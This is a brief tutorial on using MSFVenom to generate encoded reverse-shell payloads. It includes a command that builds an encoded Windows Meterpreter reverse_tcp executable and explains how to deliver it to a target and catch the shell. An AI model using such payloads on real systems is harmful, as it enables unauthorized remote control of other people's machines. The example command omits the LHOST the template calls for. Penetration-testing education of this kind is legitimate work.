What is MSFVenom?

MSFvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance. Msfvenom replaced both msfpayload and msfencode as of June 8th, 2015.  

MSFVenom is used to create payloads in a much more manual approach in comparison to using modules in the Metasploit Framework. The process with MSFVenmon allows the attacker to see the code used for the attack in a much more thorough detail, along with having more of a refined choice on the platform target.

Using MSFVenom

MSFVemon can be a bit of a fiddle if you have never used the tool before, however it can be broken to two simple steps:

1. Create a listener

2. Create your payload with MSFVenom

What is a listener?

A listener, will listen for the payload to call back home, which is you. It's referred to as catching the payload so you have a connection to the target host. You must run a listener to operate MSFVenom, there are multiple listeners you use:

• Netcat Listener
• Metasploit Listener

• Python scripts

Creating The MSFVenom Payload

Creating the payload is the essential part of MSFVenom, understanding the format of the command is incredibly useful, for example:

• msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`  

How a completed command would be presented:

• msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe  

-p: Choosing the payload appropriate to the target

-e: What encoding algorithm to use on the payload

-i: The encode count

-f: What file type the payload will be outputted to

Once the relevant flags have been the MSFVenom will need to be delivered in the correct way, whether that is file upload function or similar. After uploading the payload, there will be an explicit need to run it; this is crucial!

After running the payload you should see a change of state with the listener and either a Meterpreter shell has been caught/initiated or a standard bash shell via the likes of Netcat has been caught.

‍